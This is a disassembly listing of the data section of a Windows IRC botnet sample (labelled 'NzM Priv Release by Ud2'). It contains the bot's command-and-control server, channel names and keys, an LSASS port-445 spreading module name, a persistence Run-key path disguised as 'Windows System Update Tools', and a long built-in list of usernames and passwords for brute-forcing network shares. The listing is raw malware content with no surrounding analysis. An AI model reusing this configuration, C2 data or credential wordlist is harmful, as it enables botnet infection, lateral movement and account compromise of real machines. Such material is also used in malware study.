db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSSTotalS db ' %s Drive (%s): %s total, %s free, %s available.',0
align 4
unk_42DDB4 db 2 ; DATA XREF: sub_40D7E5+58�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDriveSFailedT db ' %s Drive (%s): Failed to stat, device not ready.',0
off_42DE00 dd offset byte_5C3A41 ; DATA XREF: sub_40D8B7:loc_40D8FC�o
dword_42DE04 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42DE50 dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_42DE6C: ; DATA XREF: sub_40DA5C+118�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42DE80 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40DA5C+13F�o
dword_42DE94 dd 25207325h, 253A2073h, 0A0D73haPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40DC10+16�o
; sub_40F6F1+623�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40DC10+F�o
; sub_40F6F1+62F�o
align 10h
off_42DEB0 dd offset aAdd ; DATA XREF: sub_40DCAB+6D�r
; sub_40E08F+50�r ...
; "Add"
off_42DEB4 dd offset aAdded ; DATA XREF: sub_40DCAB+2D�r
; sub_40E08F+82�r ...
; "Added"
dword_42DEB8 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 42DF24h, 42DF1Ch, 2, 42DF10h, 42DF04h, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: ___:0042DEE4�o
aStop_0 db 'Stop',0 ; DATA XREF: ___:0042DEE0�o
align 4
aStarted db 'Started',0 ; DATA XREF: ___:0042DED8�o
aStart_0 db 'Start',0 ; DATA XREF: ___:0042DED4�o
align 4
aListed db 'Listed',0 ; DATA XREF: ___:0042DECC�o
align 4
aList_0 db 'List',0 ; DATA XREF: ___:0042DEC8�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: ___:0042DEC0�o
aDelete_0 db 'Delete',0 ; DATA XREF: ___:0042DEBC�o
align 4
aAdded db 'Added',0 ; DATA XREF: ___:off_42DEB4�o
align 4
aAdd db 'Add',0 ; DATA XREF: ___:off_42DEB0�o
unk_42DF78 db 2 ; DATA XREF: sub_40DCAB+74�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSNoServiceSpec db ' %s: No service specified.',0
align 10h
unk_42DFB0 db 2 ; DATA XREF: sub_40DCAB+55�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 4
unk_42DFEC db 2 ; DATA XREF: sub_40DCAB+38�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
align 4
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_40DDD4+12C�o
align 10h
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_40DDD4:loc_40DEEC�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_40DDD4:loc_40DEE5�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_40DDD4:loc_40DEDE�o
db 'the state of the service.',0
align 10h
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_40DDD4:loc_40DED7�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_40DDD4:loc_40DED0�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_40DDD4:loc_40DEC9�o
align 10h
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_40DDD4:loc_40DEC2�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_40DDD4:loc_40DEBB�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_40DDD4:loc_40DEB4�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_40DDD4:loc_40DEAD�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_40DDD4:loc_40DE82�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_40DDD4:loc_40DE7B�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_40DDD4:loc_40DE74�o
db 'tServiceCtrlDispatcher.',0
align 10h
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_40DDD4:loc_40DE6D�o
align 10h
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_40DDD4+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_40DDD4:loc_40DE42�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_40DDD4:loc_40DE38�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_40DDD4:loc_40DE2E�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_40DDD4:loc_40DE24�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_40DDD4:loc_40DE1A�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_40DDD4+3C�o
align 4
aSSS db '%s: %s (%s)',0 ; DATA XREF: sub_40DF52+EB�o
aStopped db ' Stopped',0 ; DATA XREF: sub_40DF52:loc_40E01E�o
aStarting db ' Starting',0 ; DATA XREF: sub_40DF52:loc_40E017�o
aStoping db ' Stoping',0 ; DATA XREF: sub_40DF52:loc_40E010�o
aRunning db ' Running',0 ; DATA XREF: sub_40DF52:loc_40E009�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_40DF52:loc_40E002�o
aPausing db ' Pausing',0 ; DATA XREF: sub_40DF52:loc_40DFFB�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_40DF52:loc_40DFF4�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_40DF52+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_40DF52+25�o
align 4
unk_42E554 db 2 ; DATA XREF: sub_40E08F+AB�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSNoShareSpecif db ' %s: No share specified.',0
align 4
unk_42E58C db 2 ; DATA XREF: sub_40E08F+89�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSShareS_ db ' %s share: ',27h,'%s',27h,'.',0
align 4
unk_42E5BC db 2 ; DATA XREF: sub_40E08F+57�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSErrorWithShar db ' %s: Error with share: ',27h,'%s',27h,'. %s',0
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_40E284+D0�o
align 10h
aNo db 'No',0 ; DATA XREF: sub_40E284+BC�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_40E284+B5�o
unk_42E618 db 2 ; DATA XREF: sub_40E284+76�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aShareListError db ' Share list error: %s <%ld>',0
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_40E284+26�o
align 4
unk_42E688 db 2 ; DATA XREF: sub_40E3A5+B6�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSNoUsernameSpe db ' %s: No username specified.',0
unk_42E6C0 db 2 ; DATA XREF: sub_40E3A5+94�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSErrorWithUser db ' %s: Error with username: ',27h,'%s',27h,'. %s',0
align 10h
unk_42E700 db 2 ; DATA XREF: sub_40E3A5+6D�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSUsernameS_ db ' %s username: ',27h,'%s',27h,'.',0
unk_42E730 db 2 ; DATA XREF: sub_40E4EB+394�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aUserInfoErrorL db ' User info error: <%ld>',0
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_40E4EB+36A�o
align 4
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_40E4EB+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_40E4EB+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_40E4EB+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_40E4EB+2C4�o
align 4
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_40E4EB+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_40E4EB+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_40E4EB+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_40E4EB+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_40E4EB+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_40E4EB+1CB�o
align 10h
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_40E4EB+1A0�o
align 10h
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_40E4EB+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_40E4EB+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_40E4EB+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_40E4EB:loc_40E604�o
align 10h
aUser_0 db 'User',0 ; DATA XREF: sub_40E4EB:loc_40E5FD�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_40E4EB:loc_40E5F6�o
; ___:0042EEEC�o ...
align 4
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_40E4EB+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_40E4EB+AC�o
align 4
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_40E4EB+81�o
align 4
aAccountS db 'Account: %S',0 ; DATA XREF: sub_40E4EB+50�o
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_40E8B9+14F�o
align 4
unk_42E8FC db 2 ; DATA XREF: sub_40E8B9+F7�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAnAccessViolat db ' An access violation has occured.',0
align 4
aS_4 db ' %S',0 ; DATA XREF: sub_40E8B9+BE�o
align 4
unk_42E944 db 2 ; DATA XREF: sub_40E8B9+7A�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aUserListErrorS db ' User list error: %s <%ld>',0
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_40E8B9+29�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40EA39:loc_40EB56�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40EA39:loc_40EB4F�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40EA39:loc_40EB48�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40EA39:loc_40EB41�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40EA39:loc_40EB3A�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40EA39:loc_40EB1D�o
db 'ord policy requirement.)',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40EA39:loc_40EB16�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40EA39:loc_40EB0F�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40EA39+CF�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40EA39:loc_40EAE4�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40EA39:loc_40EADD�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40EA39:loc_40EAD6�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40EA39:loc_40EACC�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40EA39+89�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40EA39:loc_40EAA6�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40EA39:loc_40EA9C�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40EA39:loc_40EA92�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40EA39:loc_40EA88�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40EA39:loc_40EA7E�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40EA39+3B�o
align 10h
unk_42EC60 db 2 ; DATA XREF: sub_40EB6D+AB�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
align 4
unk_42EC9C db 2 ; DATA XREF: sub_40EB6D+81�o
db 74h, 2, 72h
db 6Eh ; n
db 28h, 30h, 31h
db 61h ; a
db 29h, 20h, 5Bh
db 6Eh ; n
db 65h, 74h, 2Eh
db 6Dh ; m
db 1Fh, 64h, 1Fh
db 6Ch ; l
db 5Dh, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aMessageSentSuc db ' Message sent successfully.',0
align 8
dword_42ECD8 dd 0D6DBh ; ___:0040F293�r
dword_42ECDC dd 0D6DCh dword_42ECE0 dd 17D2h dword_42ECE4 dd 45h ; sub_40F6F1+5560�r
dword_42ECE8 dd 2327h ; sub_40F6F1:loc_414D4A�r
dd 8234h
dword_42ECF0 dd 1 dword_42ECF4 dd 1 ; ___:0040EFA1�r
byte_42ECF8 db 2Eh ; DATA XREF: sub_40D583:loc_40D58F�r
; sub_40F6F1+AFC�r ...
align 4
dword_42ECFC dd 6 ; sub_415F27+51�r ...
dword_42ED00 dd 2 ; sub_40F6F1+27C�r ...
dword_42ED04 dd 1 ; sub_40F6F1+276�r
dword_42ED08 dd 1 dword_42ED0C dd 1 ; sub_40F326+101�r
a4492 db '4492',0 ; DATA XREF: sub_40327E+9A�o
align 4
aArrapao db 'arrapao',0 ; DATA XREF: sub_40327E+95�o
aArrapato db 'arrapato',0 ; DATA XREF: sub_40327E+90�o
align 10h
aLsass_445 db 'lsass_445',0
byte_42ED3A db 1 ; DATA XREF: sub_40F6F1:loc_41483E�r
; sub_40F6F1+5157�o
aLs1ls db 'ls1ls',0
align 4
dd 736D0100h, 737361h, 0
dd 6F636401h, 3533316Dh, 1000000h, 3 dup(0)
dword_42ED68 dd 1 aArra db 'arra',0 ; DATA XREF: ___:0040EC95�o
; sub_40F6F1+3F38�o ...
align 4
aNzmPrivRelease db 'NzM Priv Release by Ud2',0 ; DATA XREF: sub_40F6F1:loc_4157E1�o
aC0d1am0z3 db 'c0d1am0z3',0 ; DATA XREF: sub_40F6F1+62B9�o
; sub_40F6F1+6388�o
align 4
aPriv_gigaservi db 'priv.gigaservice.it',0 ; DATA XREF: ___:0040F1CB�o
; ___:0040F284�o
aSodoma_3 db '##sodoma_3',0 ; DATA XREF: sub_402B92:loc_402BAC�o
; sub_402CA9:loc_402CC3�o ...
align 4
aS0dom4j03 db 's0dom4j03',0 ; DATA XREF: ___:0040F203�o
; ___:0040F2AC�o
align 4
byte_42EDC4 db 75h ; DATA XREF: sub_40327E+84�o
; sub_403BE2+F�o ...
db 70h, 64h, 73h
dd 6578652Eh, 0
dd 646E6957h, 3173776Fh, 7379732Eh, 0
aWindowsSystemU db 'Windows System Update Tools',0 ; DATA XREF: sub_40C738+E�o
; ___:0040EFCC�o
aUpds db 'upds',0
align 4
aXtIb db '-xt+iB',0 ; DATA XREF: sub_40F6F1+6401�o
align 4
aSodoma_3e db '##sodoma_3e',0 ; DATA XREF: sub_40F6F1:loc_412A85�o
; sub_40F6F1+5312�o ...
aSodoma_3s db '##sodoma_3s',0 ; DATA XREF: sub_40F6F1+4942�o
; sub_40F6F1+4997�o
aSodoma_3s_0 db '##sodoma_3s',0 ; DATA XREF: sub_40F6F1+1DFB�o
; sub_40F6F1+1F68�o
aSodoma_3t db '##sodoma_3t',0 ; DATA XREF: sub_40B0E7+33C�o
off_42EE3C dd offset a@arrapao ; DATA XREF: sub_40F6F1:loc_4159F4�o
; "*@arrapao"
off_42EE40 dd offset aIrofferV1_3b10 ; DATA XREF: sub_40F6F1+8C9�r
; sub_40F6F1+631F�o
; "iroffer v1.3b10 [Ud2 23874155], http://"...
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicro_1 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_416561+28�o
; sub_416885+28�o
align 4
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_416561+D4�o
; sub_416885+D4�o
align 4
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
off_42EF40 dd offset byte_43C63C ; DATA XREF: sub_404969:loc_404A00�r
; sub_404969+A8�o ...
dd offset byte_43C63C
dd offset aAdministrato_1 ; "ADMINISTRATOR"
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aFubar ; "fubar"
dd offset aBla ; "bla"
dd offset aGuest_1 ; "GUEST"
dd offset aRoot_0 ; "ROOT"
dd offset aRoot ; "root"
dd offset aAdmin_0 ; "ADMIN"
dd offset aPassword ; "PASSWORD"
dd offset aTemp ; "TEMP"
dd offset aShare_0 ; "SHARE"
dd offset aWrite ; "WRITE"
dd offset aFull_0 ; "FULL"
dd offset aLadeda ; "ladeda"
dd offset aBoth ; "BOTH"
dd offset aRead ; "READ"
dd offset aFiles ; "FILES"
dd offset aDemo ; "DEMO"
dd offset aOwner_0 ; "OWNER"
dd offset aOwner_1 ; "Owner"
dd offset aEdu ; "edu"
dd offset aTest ; "TEST"
dd offset aAccess ; "ACCESS"
dd offset aUser_1 ; "USER"
dd offset aBackup ; "BACKUP"
dd offset aSystem ; "SYSTEM"
dd offset aServer_0 ; "SERVER"
dd offset aPepsi ; "pepsi"
dd offset aLocal ; "LOCAL"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aChangeme_0 ; "Changeme"
dd offset aTemp123 ; "temp123"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a654321 ; "654321"
dd offset a54321 ; "54321"
dd offset a111 ; "111"
dd offset a11111111 ; "11111111"
dd offset a88888888 ; "88888888"
dd offset aPass_1 ; "pass"
dd offset aPasswd ; "passwd"
dd offset aDatabase ; "database"
dd offset aAbcd ; "abcd"
dd offset aAbc123 ; "abc123"
dd offset aOracle ; "oracle"
dd offset aSybase ; "sybase"
dd offset a123qwe ; "123qwe"
dd offset aComputer ; "computer"
dd offset aInternet ; "Internet"
dd offset aSuper ; "super"
dd offset a123asd ; "123asd"
dd offset aIhavenopass ; "ihavenopass"
dd offset aGodblessyou ; "godblessyou"
dd offset aEnable ; "enable"
dd offset aXp_0 ; "xp"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2600 ; "2600"
dd offset a110 ; "110"
dd offset a111111 ; "111111"
dd offset a121212 ; "121212"
dd offset a123123 ; "123123"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a007 ; "007"
dd offset aAlpha ; "alpha"
dd offset aPatrick ; "patrick"
dd offset aPat ; "pat"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aFoobar ; "foobar"
dd offset aNilez ; "Nilez"
dd offset aDevil ; "devil"
dd offset aNetdevil ; "netdevil"
dd offset aNetDevil ; "net-devil"
dd offset a0wned ; "0wned"
dd offset aOwned ; "owned"
dd offset aIrule ; "irule"
dd offset aNetfuck ; "netfuck"
dd offset aFucked ; "fucked"
dd offset aCrash ; "crash"
dd offset aA_0 ; "a"
dd offset aAaa ; "aaa"
dd offset aAbc ; "abc"
dd offset aTest123 ; "test123"
dd offset aWin ; "win"
dd offset aPc ; "pc"
dd offset aAsdf ; "asdf"
dd offset aSecret ; "secret"
dd offset aQwer ; "qwer"
dd offset aYxcv ; "yxcv"
dd offset aZxcv ; "zxcv"
dd offset aHome ; "home"
dd offset aLogin_1 ; "login"
dd offset aPwd ; "pwd"
dd offset aLove ; "love"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aAdmin123 ; "admin123"
dd offset aPw123 ; "pw123"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aPw ; "pw"
dd offset aMat ; "Mat"
dd offset aMatt ; "Matt"
dd offset aMatthew ; "Matthew"
dd offset aGobo ; "gobo"
dd offset aSatan ; "satan"
dd offset aSatanik ; "satanik"
dd offset aSatanic ; "satanic"
dd offset aSpaceman ; "spaceman"
dd offset aHeaven ; "heaven"
dd offset aW00t ; "w00t"
dd offset a0wn3d ; "0wn3d"
dd offset aKiller ; "killer"
dd offset aLeet ; "leet"
dd offset aL33t ; "l33t"
dd offset aL337 ; "l337"
dd offset aHacker ; "hacker"
dd offset aHax0r ; "hax0r"
dd offset aScript ; "script"
dd offset aScriptkiddie ; "scriptkiddie"
dd offset aKiddie ; "kiddie"
dd offset aMirc_0 ; "mirc"
dd offset aUwontguessme ; "uwontguessme"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aGuessme ; "guessme"
dd offset asc_4343A8 ; "x"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset a0 ; "0"
dd offset a00 ; "00"
dd offset aDeath ; "death"
dd offset aTesting ; "testing"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset aAcademia ; "academia"
dd offset aAcademic ; "academic"
dd offset aAccept ; "accept"
dd offset aAccount ; "account"
dd offset aAction ; "action"
dd offset aAdam ; "adam"
dd offset aAdrian ; "adrian"
dd offset aAdrianna ; "adrianna"
dd offset aAdult ; "adult"
dd offset aAerobics ; "aerobics"
dd offset aAids ; "aids"
dd offset aAirplane ; "airplane"
dd offset aAlaska ; "alaska"
dd offset aAlbany ; "albany"
dd offset aAlbatros ; "albatros"
dd offset aAlbert ; "albert"
dd offset aAlert ; "alert"
dd offset aAlex ; "alex"
dd offset aAlexande ; "alexande"
dd offset aAlgebra ; "algebra"
dd offset aAlias ; "alias"
dd offset aAliases ; "aliases"
dd offset aAlice ; "alice"
dd offset aAlicia ; "alicia"
dd offset aAlisa ; "alisa"
dd offset aAlison ; "alison"
dd offset aAllison ; "allison"
dd offset aAllow ; "allow"
dd offset aAlphabet ; "alphabet"
dd offset aAmadeus ; "amadeus"
dd offset aAmanda ; "amanda"
dd offset aAmber ; "amber"
dd offset aAmerica ; "america"
dd offset aAmorphou ; "amorphou"
dd offset aAnal ; "anal"
dd offset aAnalog ; "analog"
dd offset aAnarchis ; "anarchis"
dd offset aAnarchy ; "anarchy"
dd offset aAnchor ; "anchor"
dd offset aAndrea ; "andrea"
dd offset aAndroid ; "android"
dd offset aAndromac ; "andromac"
dd offset aAndy ; "andy"
dd offset aAnfo ; "anfo"
dd offset aAngela ; "angela"
dd offset aAngerine ; "angerine"
dd offset aAngie ; "angie"
dd offset aAnimal ; "animal"
dd offset aAnimals ; "animals"
dd offset aAnita ; "anita"
dd offset aAnna ; "anna"
dd offset aAnne ; "anne"
dd offset aAnnette ; "annette"
dd offset aAnon ; "anon"
dd offset aAnonymou ; "anonymou"
dd offset aAnswer ; "answer"
